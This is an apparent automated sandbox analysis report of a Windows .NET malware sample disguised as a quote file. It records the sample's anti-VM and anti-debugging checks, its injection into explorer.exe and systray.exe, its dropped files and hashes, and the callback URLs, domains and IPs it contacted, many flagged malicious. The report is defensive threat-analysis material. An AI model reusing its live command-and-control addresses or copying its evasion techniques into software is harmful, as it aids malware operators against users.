Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662953284.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: quote20210126.exe.exe PID: 244, type: MEMORY

Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\quote20210126.exe.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\quote20210126.exe.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 00000000007598E4 second address: 00000000007598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000000759B4E second address: 0000000000759B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\quote20210126.exe.exe TID: 6044	Thread sleep time: -50342s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe TID: 4800	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe TID: 7020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7028	Thread sleep time: -518000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5840	Thread sleep count: 146 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5840	Thread sleep time: -292000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 6228	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed

Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000009.00000000.677718246.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000009.00000000.684022121.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000009.00000000.678464910.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.684022121.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.684119760.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000009.00000002.2112500104.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000009.00000000.684119760.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000009.00000000.677718246.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000009.00000000.677718246.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000009.00000000.684119760.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000009.00000000.677718246.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 150.95.52.72 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.155.181.96 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.180.2.197 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 143.92.60.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.140.151.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.49.23.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 42.194.179.169 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 70.40.220.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.253.11.194 80	Jump to behavior

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 3424			Jump to behavior

Analysis Report quote20210126.exe.bin

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: explorer.exe, 00000009.00000000.665522332.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000009.00000000.666066464.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.2094075880.0000000003130000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000009.00000000.678458758.0000000005E50000.00000004.00000001.sdmp, systray.exe, 0000000D.00000002.2094075880.0000000003130000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.666066464.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.2094075880.0000000003130000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.666066464.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.2094075880.0000000003130000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.684119760.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Queries volume information: C:\Users\user\Desktop\quote20210126.exe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
150.95.52.72	unknown	Japan	7506	INTERQGMOInternetIncJP	true
192.155.181.96	unknown	United States	132422	TELECOM-HKHongKongTelecomGlobalDataCentreHK	true
107.180.2.197	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
143.92.60.97	unknown	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	true
3.140.151.209	unknown	United States	16509	AMAZON-02US	false
198.49.23.144	unknown	United States	53831	SQUARESPACEUS	false
42.194.179.169	unknown	China	45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	true
70.40.220.182	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
198.54.117.215	unknown	United States	22612	NAMECHEAP-NETUS	false
23.253.11.194	unknown	United States	19994	RACKSPACEUS	true

Name	IP	Active
deepimper-325.com	150.95.52.72	true
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	3.140.151.209	true
recurrentcornealerosion.com	70.40.220.182	true
vivabematividadesfisicas.com	107.180.2.197	true
www.xiaoxu.info	42.194.179.169	true
nl22584.com	23.253.11.194	true
www.qianglongzhipin.com	192.155.181.96	true
parkingpage.namecheap.com	198.54.117.215	true
3002vip.mayifanghucdn1.com	143.92.60.97	true
ext-sq.squarespace.com	198.49.23.144	true
ribbonredwhiteandblue.com	34.102.136.180	true
www.studioeduardobeninca.com	unknown	unknown
www.appliedrate.com	unknown	unknown
www.formabench.com	unknown	unknown
www.vasquez.photos	unknown	unknown
www.followmargpolo.com	unknown	unknown
www.ribbonredwhiteandblue.com	unknown	unknown
www.deepimper-325.com	unknown	unknown
www.recurrentcornealerosion.com	unknown	unknown
www.sorryididnthearthat.com	unknown	unknown
www.vivabematividadesfisicas.com	unknown	unknown
www.0343888.com	unknown	unknown
www.merckcbd.com	unknown	unknown
www.nl22584.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.deepimper-325.com/dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s	true	Avira URL Cloud: safe	unknown
http://www.formabench.com/dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s	true	Avira URL Cloud: safe	unknown
http://www.merckcbd.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY	true	Avira URL Cloud: safe	unknown
http://www.vivabematividadesfisicas.com/dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s	true	Avira URL Cloud: safe	unknown
http://www.0343888.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZT	true	Avira URL Cloud: safe	unknown
http://www.recurrentcornealerosion.com/dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s	true	Avira URL Cloud: safe	unknown
http://www.ribbonredwhiteandblue.com/dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s	true	Avira URL Cloud: safe	unknown
http://www.nl22584.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x	true	Avira URL Cloud: safe	unknown
http://www.vasquez.photos/dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s	true	Avira URL Cloud: safe	unknown

ID:	344748
Product:	CloudBasic
Start time:	03:15:34
Start date:	27.01.2021
Sample:	quote20210126.exe.bin
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	1685762eb9eb252f560a5e7a33f78ef1
SHA1:	8069ef4b521b80772e3af6d7e5fd162f824d2c96
SHA256:	33c5a410d6ac03a18a033a6162b958efec61a9ab0caf991ecf6bc3a7d0ae0528
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\quote20210126.exe.exe.log	ASCII text, with CRLF line terminators	1DC1A2DCC9EFAA84EABF4F6D6066565B	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
C:\Users\user\AppData\Local\Temp\tmpC686.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	9426325041983C4CC3F7271D52356276	5F6E0AC8C1D9A3816D84F17BCCA7D885B4261E7C	BA2BC8361FC1F911D12B6A54D87050AA783ACD1709BAFAFD4920928ACF9724E2
C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	1685762EB9EB252F560A5E7A33F78EF1	8069EF4B521B80772E3AF6D7E5FD162F824D2C96	33C5A410D6AC03A18A033A6162B958EFEC61A9AB0CAF991ECF6BC3A7D0AE0528
C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309